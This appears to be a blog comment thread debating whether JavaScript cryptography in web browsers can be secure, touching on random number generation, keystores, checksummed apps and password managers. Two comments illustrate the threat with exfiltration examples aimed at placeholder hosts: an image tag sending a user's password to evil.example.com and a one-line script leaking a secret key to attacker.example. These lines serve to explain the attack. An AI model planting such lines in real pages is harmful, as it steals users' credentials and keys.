        A question for ‘Side B’: do you trust SSL in the browser ? Do you trust the CA’s ? Do you trust the government where the CA is located ? And how about for every CA ? Do you trust your native application ? Is the browser not a native application ? Do you trust DNS ? Do you trust the vendor of non-open-source proprietary software or do you trust open source software ? Do you trust the firmware and hardware in your system ? Do you trust your compiler ?

        Or put another way: what can you verify ? And how do you do that ? I assume you at least verify that which you can, but I doubt this is the whole stack.

        So I say, perfection is not possible, people are building and will build these systems. So can we please help them to create systems that are as secure as possible ? Based on known secure protocols and methods. With API’s which help prevent mistakes and guidelines for how or how not to use them. Maybe implemented with process separation and sandboxing and who knows what else.

        I agree Javascript should not handle the plaintext, I think the browser should do it and the user should give the browser a passphrase, or the passphrase of the keystore.

        I can’t imagine this is all that different from client-certificates for https we already use. Or what is implemented in Firefox Sync for example.

      10. Thomas –

        I understand #7 completely. It’s similar to the issue we have with ld.so and its versioning scheme: if you run a software update, despite the fact that you’ve ‘verified’ the signature of some random library or piece of software you certainly haven’t verified it in combination with the *particular* libs it will runtime link to on your *particular* os. js really isn’t unique here, we just don’t think about our operating systems as containers to run arbitrary code downloaded from the internet in unverified configurations when, in fact, they are *exactly* that.

        I maintain that nearly every comment on this page doesn’t really understand that fact: verification means *nothing* outside the context of a known hardware and software configuration. no one does this except certain off-net systems.

      11. Lennie – nice to see at least one person hasn’t given up on the problem – that *normal* people currently have *zero* usable systems of exchanging digital secrets despite > 1/2 a century of cryptography + comp-sci

      12. ara.t.howard – I’m sorry to say this, but being unwilling to accept that something is impossible does not make it possible. Note that different fields have different definitions of “impossible”, and cryptographers’ is closer to mathematicians’ than to engineers’. I’m now going to do something more useful than responding to you again.

        Lennie – what makes you think Nate (and, for that matter, Thomas, and even me) don’t want to have the best crypto implementations possible? That is why we are spending our valuable time telling everyone not to use Javascript cryptography.

      13. ara.t.howard well, I came here not to cry about how bad the situation is (it is), but to say we should improve the situation. If we really want people to use things like Chrome OS and put all our data in the cloud, then I think we need crypto. For many years, when people asked me, I always said: create a ‘web-application’, you can have it hosted where you want or you can run it like an intranet or on your private cloud or even on your NAS-box or a $100 US wall plug. With a standards-compliant web application (not some IE-only or even webkit-only thing) you have a multiplatform application, thus you won’t be stuck with a single toolkit. When mobile comes to the web you can access your application from anywhere you want. When/if Linux starts to suck as a webserver, you can move it over to a BSD, Solaris, Mac OS X or Windows without having to change the frontend.

        Now with “HTML5” we seem to have a lot more tools and standards to make it act more like native applications. Mobile is leading the way with touch. There is even hardware acceleration and a standard for a subset of OpenGL. But what is missing ? Crypto. With the speed improvements of javascript engines and CPU’s, advances like multiple cores and webworkers, people are even more likely to build crypto into their applications, because it isn’t slow anymore. The problem is obvious: coding this in javascript is useless, it is a security nightmare, it always has been.

        The only thing that is supposedly secure in a browser which uses crypto is TLS. The page doesn’t interact with it directly, the browser does the work, the page just does its own part.

        So let’s do the same with messages. Maybe even files, as HTML5 already supports drag/drop; there is even an experimental API for whole directories.

        TLS has always been seen as slow. Slower on the server and slower to connect with. Now that Google has looked at SSL/TLS and the HTTP protocol more closely we see big improvements. SPDY, False Start, etc. I don’t think anyone expects SPDY to be backwards-compatible in the field when it is just used for TCP/HTTP. There are still too many proxies out there which will not understand it. While they will allow CONNECT on tcp port 443 just fine. So I think TLS with SPDY, etc. could even be faster than just plain TCP/HTTP.

        Yes, there is still a very long way to go. We still have not achieved a 100% market share of browsers which support SNI, and IPv4 addresses will be harder to come by. We still haven’t solved the problem where any CA can create a certificate for anything they want. But possibly there is a solution for that too: the root is signed with DNSSEC, which can be used to verify data in DNS. Will this solve those problems next year ? I doubt it, but there is a way forward.

        I see the same hesitation or even plain disgust with IPv6. Yes, IPv6 was created more than 10 years ago and they tried to solve problems in ways we might not have done if we had to do it all over again. But IPv4 depletion is here and IPv6 is our only real choice.

        IT doesn’t exist to create jobs or wealth, it exists to find solutions to problems and implement them.

      14. Nate –

        How can you on the one hand assert

        “a crypto web service provides both read/write access to secrets and messages should be trusted by users”

        and on the other assert

        “a web service that provides merely read access to random bytes should not be trusted by users”

        this seems like quite a logical contradiction to me: if you propose that a user should be able to trust an entire crypto stack on a server, why wouldn’t individual components, like the csprng, key generation, etc, also be able to be provided by the same service?

        If you’re hung up on https://random.org/ as the url just replace this with https://natelawson.com/urandom – point being, lack of csprng in js cannot be a technical barrier since this component could easily be provided via a web service – perhaps simply exposing the csprng of the exact server side system you’ve been recommending.
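
        For what it’s worth, a minimal sketch of such a service’s client side, assuming a hypothetical same-origin /urandom endpoint that returns hex-encoded bytes over HTTPS:

            function fetchRandomHex(numBytes, callback) {
              var xhr = new XMLHttpRequest();
              xhr.open('GET', '/urandom?bytes=' + numBytes, true);
              xhr.onreadystatechange = function () {
                if (xhr.readyState !== 4) return;
                var hex = (xhr.responseText || '').replace(/\s+/g, '');
                // fail closed if the response is missing, truncated, or malformed
                if (xhr.status === 200 && hex.length === numBytes * 2 && /^[0-9a-fA-F]+$/.test(hex)) {
                  callback(null, hex);
                } else {
                  callback(new Error('randomness service failed'), null);
                }
              };
              xhr.send(null);
            }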

        Despite everyone’s insistence I do feel you’ve managed only to show how js crypto is young and very hard to do – not that it is technically impossible.

      15. @ara, I didn’t say either of those things you quoted. I’m having trouble even figuring out what you’re claiming I said there.

        My guess is that you are saying I’m recommending server-side crypto over your JS crypto approach. I’m not doing that. If I were to recommend something, it would certainly be client-side crypto using a heavyweight app (e.g., PGP, maybe with the Enigmail plugin). I would not recommend someone use either your JS crypto note storage service or a hypothetical reimplementation of it using server-side crypto.

        If I had to choose one of the latter two options, I would very reluctantly recommend the server-side implementation. At least it would be obvious that the server is managing your password and files and makes no claims about “host-proof” security. (I know you don’t use that exact phrase, but you do say on your website “your notes are private because even cryptic.ly can’t read them.”)

      16. Hi Nate,

        sorry, but the trust model is NOT the same if done right. Example: Clipperz.

        Let me explain:

        1) You forgot about a simple solution to prevent loading additional malware JavaScript without breaking checksums: place everything inline.
        Details: The Clipperz app is completely Open Source, the checksum of the *running* application is known and *everything* is located within ONE file, even the graphics and language files are placed *inline*. !!!One file!!!
        This means that “Admin adds logging to SEKRIT_CRYPTO.js to debug something, sees user’s passphrase” is simply NOT possible without breaking the checksum (Note: the source code of clipperz is located in different files, for sure. But the index.html which runs the service will be created by the build process, which merges all the contents of the different files into one, and the checksum of the result is known).

        2) Clipperz offers an offline copy. You can log in and you’ll get the Clipperz application and your encrypted dataset inline for read-only offline usage. Because the offline copy is by far faster, you normally want to use it daily and update it after you changed data online.

        This is a HUGE difference: it simply does not affect an offline-copy user if clipperz was hacked and no one detected the new “img src=evil.example.com?user=…&pass=…” for a few hours or so (and this is very unlikely, cause – as said – a simple sha1 is enough and I’m sure a couple of users and Clipperz itself will do such checks more than once a day). Additionally, this attack won’t catch any user who checks the checksum before using Clipperz online.
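
        For concreteness, a sketch of such a check (sha1Hex() stands in for an independently obtained SHA-1 routine, and the expected digest has to come from somewhere other than the server being checked, or the check proves nothing, which is the objection further down this thread):

            var EXPECTED_SHA1 = 'digest-published-out-of-band'; // placeholder value
            var xhr = new XMLHttpRequest();
            xhr.open('GET', '/index.html', false); // synchronous, for brevity only
            xhr.send(null);
            if (sha1Hex(xhr.responseText) !== EXPECTED_SHA1) {
              throw new Error('served application does not match the published checksum');
            }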

        I won’t say that everything is perfect (because someone may break Clipperz silently and may find a *tricky* way to get into the database and manipulate the encrypted data-sets which are merged inline into the offline copy to get something like “img src=evil.example.com?user=…&pass=…” into the offline copy). But it is FAR better than “you have to trust the server and admin”. The clipperz model ensures:

        – If the database gets copied, the user’s data is encrypted
        – The user can easily check if the online version was compromised by generating a checksum. It works with clipperz cause every single bit of XHTML, JS, CSS and images (->base64!) is placed *inline*. I don’t have to rely on Same origin or stuff. If I do so before using it, I don’t have to trust the admin or the server security. The only thing which gets loaded is the encrypted data, which is by far easier for the application itself to check for manipulation (cause this should make the data unusable).
        – Clipperz is Open Source. I am able to run my own server. And I can trust myself. And I can trust my server’s security because I can also check the checksum of the Clipperz on my own server.

        BTW: “Numerous libraries not maintained by cryptographers”… Marco did his final thesis in Numerical Analysis and was research fellow at the Parallel Algorithm Research Centre. I think he is able to get himself into crypto.

        Andreas (not related to but interested in Clipperz)

      17. Andreas, since you were not part of this original thread, I’ll reply this once.

        On ONE file being an effective root of trust to checksum, the Clipperz website says:

        “An app developed with Ajax sends requests to the server in background and uses the power of DHTML to write updates to the page, i.e. it tends to not actually do page transitions, hence solving the problem of keeping a persistent key to perform crypto operations.”

        Also, the SHA-1 checksum on the Clipperz web page appears to be served by the same server that sends you the Javascript itself.

    3. Nate –

      You’ve interpreted that correctly. Until just now I don’t think I understood that you weren’t actually recommending your implementation #2 (server-side crypto) as a good one, but, if you had been, it struck me as odd that you’d take issue with a random number generation service…

      I do also understand now that your opinion is that for users that cannot/will not install a heavyweight application there isn’t anything better to do.

      We may have to agree to disagree on this point as I know there are definitely improvements, no matter how small or difficult to implement, that can be offered to people now as an alternative to simply gmail’ing passwords and bank accounts around.

    4. Oohh, I completely missed that part:

      “Lennie – what makes you think Nate (and, for that matter, Thomas, and even me) don’t want to have the best crypto implementations possible? That is why we are spending our valuable time telling everyone not to use Javascript cryptography.”

      So what are you doing to get good crypto to the people ? Is there some kind of proposal I could read ?

      What I’m trying to say is, you have to have an alternative.

      Sorry for being so incredibly verbose before. :-)

      1. No. You do not have to have an alternative. That is not how the world works; nobody with software security evaluation experience would ever make that claim. Sometimes, the answer is simply: “there is no way to do this thing safely and the right answer is not to do it at all”. When you do it anyways, knowing that it’s flawed, simply out of pique, your actions border on unethical.

      2. Thomas –

        It’s really depressing that, despite the fact that the *only actual technical* obstacle to doing a sound crypto implementation (Nate’s points 1-7) in the browser is the lack of a CSPRNG, and that this is trivially solved by providing a server-based api originating from the same source as the js, you would continue to say that ‘there is no way’ to accomplish the task at hand.

        When a person does something possible, which is nonetheless very hard, it’s occasionally called ‘a service’ by the people who benefit.

        Honestly, all secret sharing techniques have built within them intractable problems: if you are so focused on impossible problems, why not go to work figuring out how to solve the issue that there is *no way possible* to prevent the authors of openssl or gnu-pgp from releasing a cleverly crafted version that would grab 1000s of passwords/passphrases before being detected… It would be as useful to real people as you insisting that a pile of cultural issues somehow made a different design pattern technically impossible, which it is *provably* not.

        Just stop and consider: the authors of *any* secret sharing program, the designers of any cryptographic protocol, etc, have the ability and knowledge to mount attacks which cannot be prevented. Period (one time pad excepted). If you take the position that javascript is authored anew on each request you have the same issue, of course, but there is nothing that compromises, *by definition*, the communication channel: it still requires malicious acts on the part of the software author to reveal people’s secrets. As Nate himself has carefully described: the chain of trust is the same but the implementation is very, very difficult to get right. Difficult != Impossible.

      3. I disagree that lack of the PRNG is the “only technical obstacle”. As I said, the browser is a poor environment for doing crypto. Beyond no PRNG, there is no keystore (cert/private key storage, access mediated by the browser user). So you have a fundamental missing feature that means the user has to 100% trust the server or code generated by the server to work with their private keys.

        With my hypothetical JS PGP bindings, the user can allow the server’s code to sign things on their behalf. But that’s not enough for a secure system. You also need a signature-binding standard where everyone agrees that some aspects of the script’s origin are tied up in the signature. This way a script run on coupon site X cannot have your browser sign “debit my bank account $1m” messages purporting to be for site Y.
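
        A hedged sketch of that binding idea (browserKeystore.sign() is entirely hypothetical; no such API exists today, and the point is only that the page’s origin gets folded into whatever is signed):

            function requestSignature(messageBody) {
              var bound = JSON.stringify({
                origin: window.location.protocol + '//' + window.location.host,
                body: messageBody
              });
              // a signature over "bound" cannot be replayed as another site's message,
              // because the verifier checks the embedded origin
              return browserKeystore.sign(bound);
            }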

        As you can see, there are fundamental security problems that need to be addressed before browser support for true JS crypto can be added. What people call “JS crypto” today is just clientside computation of arbitrary server-specified logic.

      4. Lennie – JS crypto is just a bad idea. I’m working on leakage-resilient cryptography (under Pietrzak, Google for “A leakage-resilient mode of operation”), which will hopefully make it easier to build hardware “crypto appliances” that cannot be broken with a side-channel attack. Think “smartcard”, or one of the tokens issued by many banks – they are pretty user-friendly, although not free. We are not in a stage to issue concrete proposals yet, though, and I’d be very surprised if we were the ones to come up with concrete proposals.

        ara.t.howard – that’s not nearly the only issue.

      5. Joachim.

        Let’s get this straight:
        I know I don’t want to have javascript handle any calculations or other crypto-related operations, I would like to see an alternative though. I was asking if this works:

        – javascript or anything in ‘the page’ does not handle any plaintext, just encrypted data
        – the encrypting/decrypting is handled by the browser
        – some GUI-elements are added to the browser for the user
        – the browser shows the user the plain text, the rest of the page does not have any access to it. It might look similar to a textarea when the data is decrypted. Where the size of the text does not influence the size of the box on the page.
        – the browser has a key-storage, it contains the keys in encrypted form
        – the user needs a passphrase to have the browser decrypt it and get the keys it needs to decrypt the data

        Now I’m not familiar with what leakage means to crypto-people. When I read it I assumed you meant during crypto operations.

        But what I mentioned above doesn’t look much different from how crypto is handled with TLS (https) to me. Or how client-certificates for TLS (https) are handled.

        Or when you mentioned “leakage” did you mean leakage of the keys stored in the browser ? That’s why I mentioned: passphrase.

        And to be honest, every time I see a smartcard implementation which is intended for widespread use they messed it up. These things don’t have the processing power to be secure (because everyone wants anything which is for widespread use to be cheap) and the industry seems to mess up the crypto every single time. Just have a look at the Public Transport card in the Netherlands, you should be familiar with it.

        Maybe you know of a success story with these kinds of cards, every implementation where I looked at some of the details was a failed project.

      6. Nah, “leakage” (as I used it above) isn’t really present in the usual Javascript-webserver model. Leakage in the sense of “leakage-resilience” is about resistance to side-channel attacks, i.e. attacks that do not respect the black-box model commonly used in cryptography. As a concrete example, the power use of a smart card may be related to the key material. The best introduction to leakage-resilience (which is a mathematical way to try to prevent these attacks) that I’m aware of is my supervisor’s; note I’m probably biased.

        A better understanding of these issues may make it possible to achieve a better level of security and/or lower costs. Yes, I agree that hardware tokens are not nearly as secure as they could be, although quite a few banks do issue hardware tokens (which are at least good enough to earn back the investment) and things like the (pricey!) RSA SecurID tokens seem to stand up well to non-expert attackers. The Dutch OV-chipkaart doesn’t really prove anything except that stupidity gets you hacked.

        With respect to your actual question: is this comment a sufficient response (“you might be able to do it, under optimistic assumptions, but you’d have to forbid any way to make it even a little convenient”)? If not, I’m happy to consider other arguments or elaborate on my reasoning.

      7. Joachim –

        re: “that’s not nearly the only issue”

        actually, if you re-read Nate’s list you will see that his entire argument can be summed up by two points: first, the somewhat circular:

        “it’s really hard to write a good, safe, portable crypto lib in js and no one has done it yet, therefore it cannot be done”

        and the real, but solvable:

        “browsers have no csprng”

        it’s true that browsers don’t have them but, fortunately, getting random numbers from a same-origin service safely is 30 minutes’ work. it is true, in that narrow sense, to say that ‘js cannot do it’. it is not true, however, to say this implies good crypto cannot be done in the browser if one assumes the existence of a server-side component.

        I understand your position, especially considering that your work requires you not to see a solution.

        Regards.

      8. This is absolutely not what I am saying. See my previous comment re: keystore for yet another problem that is impossible to solve in the current browser environment.

      9. A high-level library that looks promising:

        NaCl: DJB’s new crypto library

        I think the cryptographers that do contribute code are starting to learn how to do it better. Developers do not need a grab-bag of algorithms, they need protocols. GPG and OpenSSL are good examples of how to offer both, although the implementation of OpenSSL should not be repeated.

      10. ara.t.howard – I do agree that the lack of a PRNG can be overcome, if you ignore the problems with Javascript as a language/environment (including (4)). You don’t even need to connect back to the server: old-school crypto programs, including modern PuTTY, would make the user move their mouse over a rectangle or somesuch – you can get the randomness directly from the user.

        I’ll refrain from responding to the rest of your message.
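
        A rough sketch of that mouse-movement idea in browser JS (collection only, not a CSPRNG; a real design would hash the pool and mix in other sources before using any of it as key material):

            var entropyPool = [];
            document.onmousemove = function (e) {
              e = e || window.event; // older IE passes the event via window.event
              if (entropyPool.length < 3000) {
                // record coordinates and a timestamp; stop once the pool is "full"
                entropyPool.push(e.clientX, e.clientY, new Date().getTime());
              }
            };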

  18. So many of these comments seem to be about what people want crypto to do for them. Virtually none of them — even Franke’s, from a person who knows crypto — seem to be based on what crypto can do.

    1. precisely right. software that can do nothing useful for people is good only for writing textbooks. people’s information is increasingly distributed, accessed remotely, and shared. it seems quite reasonable to solicit the best minds for how existing, or new, crypto techniques might be used to do this better, perhaps incrementally so. it seems reasonable that people will always talk about what they *want* software to do rather than what it already does. right?

      1. I *want* to poop nothing but Lucky Charms Purple Horseshoe marshmallows, but the phenomenon of human digestion is governed by scientific rules, not my whims and desires. What I’m saying is, “but wouldn’t it be awesome if Javascript could do XXX” isn’t pertinent; the question is, “what can it do?”.

      2. as it’s turing complete and downloaded over the internet i think it’s accurate to say that it *can* do anything any client software downloaded from the internet can do. as far as i am aware the discussion is about how reasonable it is to do so since we know that, on paper, it’s not impossible. probably the superlatives aren’t helping anyone figure that out… if you are 100% convinced that javascript is somehow not turing complete and that binary code downloaded over the internet is somehow fundamentally safer than scripting languages downloaded into a sandbox then you won’t be able to contribute much…

      3. “On paper”, it is impossible.

        The current standardized JS browser environment has no crypto support so your argument about “but the language is turing complete” is beside the point. You don’t get secure keystorage from Turing-completeness.

      4. you do not need secure key storage…. the key can be aes encrypted in the browser (assuming that works ;-)) and stored on the server for later use. alternatively one could use aes encrypted html5 storage.
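
        A minimal sketch of that idea, using SJCL’s high-level encrypt/decrypt for illustration (variable names are hypothetical, and the entropy pool is assumed to be seeded already):

          // Generate a random data key, wrap it under the user's passphrase
          // (PBKDF2 + AES in SJCL's default mode), and park the wrapped blob
          // in HTML5 localStorage; it could just as well be POSTed to the server.
          var dataKey = sjcl.codec.base64.fromBits(sjcl.random.randomWords(8));
          localStorage.setItem("wrappedKey", sjcl.encrypt(passphrase, dataKey));

          // Later, on another visit:
          var recovered = sjcl.decrypt(passphrase, localStorage.getItem("wrappedKey"));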

  19. Re: “getting random numbers from a same origin service safely is 30 minutes work”

    OK, so in order to do that you need (A) a solid concept of “same origin” identity and (B) a strongly authenticated channel in which to send them.

    In order to have (A), you need the absence of even the smallest website bugs and also for every resource in the entire browser tab to have been delivered via (B) from completely trusted parties.

    In order to have (B) you need a TLS channel authenticated with a valid server certificate for the correct server.

    If you presume the existence of properly functioning TLS, then you have also presumed the existence of strong encryption on all back-to-origin channels.

    So what are you proposing to do with client-side JS crypto and how is it more efficient or more secure than what can be done now?

    1. Marsh –

      You are correct, all from the same host and all HTTPS, no HTTP of any type in fact…

      The contract between the server and end user, when JS crypto is used (there is also crypto on the server, but that is beside the point), is:

      “by doing the first layer of encryption (on plaintext) in the browser, out in the open for all to see, we are giving the users a *chance* to witness any attempts to hi-jack their passphrase, steal secrets, etc”

      the contract between the server and user, when JS crypto is not used (despite any encryption done on the server), is:

      “by passing your passphrase over the secure channel for us to use on the backend, you, the user, cannot possibly detect attempts to save your passphrase or sniff secrets”

      The trust model is the same but the ‘un-trust’ model is not: doing everything on a server over a secure channel gives ZERO chance of an end user being able to detect an attack.

      In case you missed it, I’m proposing:

      1) 100% https and no cross domain anything whatsoever.

      2) all the normal encryption techniques employed on the server (PGP-like, one secret per message).

      3) an additional layer done in the browser to enable privacy between the user and the server.
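
      A minimal sketch of what (3) could look like (SJCL for illustration; the /notes endpoint is hypothetical):

        // Encrypt the note under the user's passphrase in the browser, so the
        // server only ever receives ciphertext over the existing HTTPS channel.
        function saveNote(passphrase, plaintext) {
          var blob = sjcl.encrypt(passphrase, plaintext);   // PBKDF2 + AES
          var xhr = new XMLHttpRequest();
          xhr.open("POST", "/notes", true);
          xhr.setRequestHeader("Content-Type", "application/json");
          xhr.send(blob);      // the passphrase itself never leaves the page
        }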

      Before someone else jumps in and says something silly like “but the server can send down malicious js to log passwords”, remember that malicious operations by authors or code providers can be an attack on ANY system, including native client apps. Firefox, for example, could easily log every password for every site you ever visit by exploiting this same trust relationship – of course we all know this has happened with applications, sometimes just reporting system details, etc., but the argument is not academic: it does and will happen.

      1. The argument that “the server can send down malicious js” is not silly, and you haven’t provided any valid counterargument to it. Note that it may not be the intended server that is sending that JS, unless you’ve fixed all of the browser weaknesses, including user interface weaknesses, associated with 1). (If you know how to do that, please help! It’s a much more worthwhile project to concentrate on than Javascript crypto.)

        The fact that this is also true for client-side apps in current operating systems is not a valid counterargument, since that does not make it any less true for JS scripts. The proper conclusion is that operating systems need fixing in order that this is no longer true for client-side apps (which is possible, in principle).

  20. “by doing the first layer of encryption (on plaintext) in the browser, out in the open for all to see, we are giving the users a *chance* to witness any attempts to hi-jack their passphrase, steal secrets, etc”

    Take a hard, honest look at exactly how much that’s worth. In my opinion, and that of a few others around here, it’s worth approximately zero.

    Here’s why:

    Any additional “chance” to prevent these attacks is basically the data exfiltration problem. Although there’s an entire sub-industry (“DLP”) dedicated to addressing this, it remains essentially an unsolved problem. There are systems that can probably block long lists of Social Security Numbers from accidentally being sent out in email, but trying to block a single password from leaving a network-attacked web browser? Forget it.

    It’s a classic example of a situation where there’s an asymmetric advantage in favor of the attacker. (The defender must succeed every time; the attacker only needs to succeed once.) E.g., consider the knockout blow in the first round of the contest between PFC Bradley Manning (attacker) and “The Entire US Government” (defender). That contest reportedly took place on the defender’s home turf (a secure air-gapped facility) and involved exfiltrating hundreds of MB, not just a single password or secret key, using unsophisticated techniques.

    All it takes is a short string of attacker-supplied Javascript for the entire same-origin security model to fall apart. Once that happens, it is not useful to talk about the “severity of the compromise”; you really are 100% pwned at that point. The browser security model is a total house of cards.

    Once an attacker succeeds in running that bit of script, all he needs is the tiniest covert channel to leak your short secret key out. It doesn’t even have to happen right then over https; it could be arranged to happen at a later time without even running script! For example, the attacker could probably pre-cache resources which expire at some future time, causing bits of plaintext to leak out via DNS queries that the browser makes as it assembles the page.
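
    To make the “tiniest covert channel” point concrete, a single injected statement is enough (attacker.example and the variable name are placeholders):

      // One line of attacker-supplied script leaks the key via an ordinary
      // image fetch; nothing in the same-origin policy blocks the outbound request.
      new Image().src = "https://attacker.example/c?k=" + encodeURIComponent(secretKey);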

    These are real attacks that have been demonstrated, not just problems “on paper” that get in the way of the wider use of crypto.

    I think the only logically defensible conclusion is that you have to keep that short string of attacker-supplied Javascript from executing, because once it does, it’s game over.

    Now, all that said, I might switch sides a little bit. :-) I have a friend who had what sounded to me like a possibly reasonable use of Javascript. I’ll see if he wants to describe it himself. But still, the only way it’s possibly reasonable is that it specifically avoids making certain fundamental security claims.

    1. Sure, feel free to post the example. That’s the original request in this article anyway — applications that use JS in a way that adds something server-side crypto does not.

  21. I’ve temporarily turned on comment moderation since this discussion has run its course. Except for Daniel Franke (proof-of-work systems), no one has suggested a potential application where browser-based JS crypto as it stands today adds anything.

    If you do come up with something, post it and I’ll approve the comment. Thanks!

  22. Nate,

    Do you make any distinction, in terms of JS crypto “making sense”, between Javascript crypto served with web sites and Javascript crypto that is part of a browser (Firefox) extension?

    -Brien

    1. Does the browser extension use native libraries, such as NSS or OpenSSL? In that case, my concerns would be more in the area of “don’t create your own crypto protocol”, which applies to any language. If it doesn’t, then it is mostly the same as web-based JS but with less frequent updates.

      My overall concern with browser extensions is that they have a trust model similar to ActiveX, but Firefox does not have killbits yet. So you can expect similar growing pains.

      1. Firefox has a blocklisting mechanism that is similar to ActiveX killbits. The current list of blocked extensions is here.

        That said, blocklisting and killbits are arguably more of an ass-covering exercise than an effective mechanism for dealing with the problem of exploitable extensions or ActiveX controls. There is, however, some work going on toward limiting the authority of future Firefox extensions, as part of the Jetpack project.

      2. Yeah, I wasn’t holding up ActiveX killbits as a shining example. It was more like “FF extensions have had even less thought put into revocation than ActiveX, and we all know how that turned out.”

        Glad to hear they’re working on it though.

      3. I’m not sure yet, it’s a work in progress.

        I’m building an application to (hopefully) improve password management and I’m considering browser integration.

        The weakness that I’m addressing is that all the password managers I’ve seen offer all-or-nothing access. Once you unlock a database, the entire database is susceptible to compromise by badware.

        My idea is to add another factor that must be used to unlock each individual password entry.

        I’m looking at adding this to the firefox password manager (via an extension), but after reading a lot of your gripes I’m left with the feeling that it is bad news to do this in a browser environment altogether and that it is way safer to use a native password manager app.

      4. I’ve started a thread on sci.crypt seeking comments on my design.

        I know your mantra of “don’t create your own crypto protocol”, but I’m not aware of any existing one that applies to my problem.

        Again, you’ve sufficiently dissuaded me from attempting to do this directly in Firefox, and I’m going to do it as an extension to the popular open source password manager KeePass.

        http://groups.google.com/group/sci.crypt/browse_thread/thread/1d8e705a4036f182#

      5. Getting advice is always a good start. You could solve this in KeePass with URL-matched password groups — don’t change the base encryption scheme, just make it easier to auto-select a database to unlock. Then partition passwords into high/med/low security groups. It should be more of a usability thing than a crypto thing.

      6. Nate,

        Yeah, I thought about that approach. My problem is that I’ve been using a password manager for a number of years and I’ve now got literally hundreds of passwords in the database. Maybe a dozen or two are banking-related. In the degenerate case you’ve got a separate database for every password, which basically turns into the scheme of remembering the passwords for each site in your head.

        This logic led me to the conclusion that I must introduce another independent device into the picture. Being a reader of yours I appreciate the wisdom of not creating your own protocols, but I really don’t know of anything that mirrors the requirements of this problem.

        Thanks,
        Brien

  23. Unhosted web apps have central per-app source code, but decentralized per-user storage resources. From the browser, they use Cross-Origin Resource Sharing (CORS) to store data on the per-user hosts. The app encrypts and signs this data before it leaves the browser, so that the per-user host doesn’t get to see or modify the contents (that way, you can use commodity hosting for the per-user resources).

    The app’s home domain only provides flat files; it doesn’t do any server-side processing (we want to make it feasible to publish successful open source web apps on only a few cheap static servers). This is why we use in-browser JS crypto.
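
    A minimal sketch of that flow (SJCL for illustration; the storage host, path, and function name are placeholders, and the host is assumed to allow the app’s origin via CORS headers):

      // Encrypt (and, via SJCL's default AES-CCM mode, authenticate) in the
      // browser, then PUT the opaque blob on the untrusted per-user storage
      // host with a CORS request; the storage host never sees plaintext.
      function storeBlob(userKey, path, plaintext) {
        var blob = sjcl.encrypt(userKey, plaintext);
        var xhr = new XMLHttpRequest();
        xhr.open("PUT", "https://storage.example.net/" + path, true);
        xhr.send(blob);
      }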

    Several people have suggested that this is a legitimate use of JS crypto, and as such an exception to your excellent blogpost, but we would like to hear your opinion about this. Many thanks!

    1. I believe the entire article applies. This is just the secure note-taker app I used as an example but with storage on a different host than your code server.

      1. Oh, yes, I wasn’t saying that the disadvantages of js crypto (poor code maturity, flaky environment, etc.) magically stop existing for us. Only that we have a legitimate reason to put up with them.

        The code server only serves flat files and no dynamic content (no server-side processing), which is why we have to rule it out for the role of en-/decryptor.

        The storage node is the one we don’t entirely trust, so it is ruled out as well.

        That means en-/decryption has to happen on the client device. For argument’s sake, assume that the end user doesn’t have administrator privileges on the client device (maybe it’s an internet cafe); then installing a desktop app or browser plugin is also impossible.

        That leaves you with two options: the browser’s crypto object if you’re using Mozilla, or pure-JS crypto for other browsers.

        As I said, I acknowledge the disadvantages of js crypto that you list: even SJCL is at best immature, there are too many underlying platforms, the DOM and other environment elements can’t be trusted, there’s no good prng, and you can’t audit code that is downloaded every time and may be cached. All of this is true for unhosted web apps, and we’re trying to make the best of it, while knowing it’s not perfect.

        I’m only saying that, unlike in a normal ‘hosted software’ situation (where you can easily move the encryption to the server), we do not have any alternative place to move the crypto to.

      2. Ok, thanks for the clarification. Perhaps we agree on this: given your choice to constrain your platform to pure-JS in the browser, you’re doing the best you can.

        On the other hand, if you provided a native executable for Windows, Mac, and Linux (and the Mac/Linux-based phones), you could build something a lot like Freenet with no server-side crypto either.

  24. When you encrypt data, that means you think an attacker is listening to your traffic. If they’re listening to it, then something is wrong already. Adding Javascript crypto to a clear stream won’t help – they can just modify it. Adding Javascript crypto to an SSL-protected stream doesn’t add security if it’s encrypted already.

Comments are closed.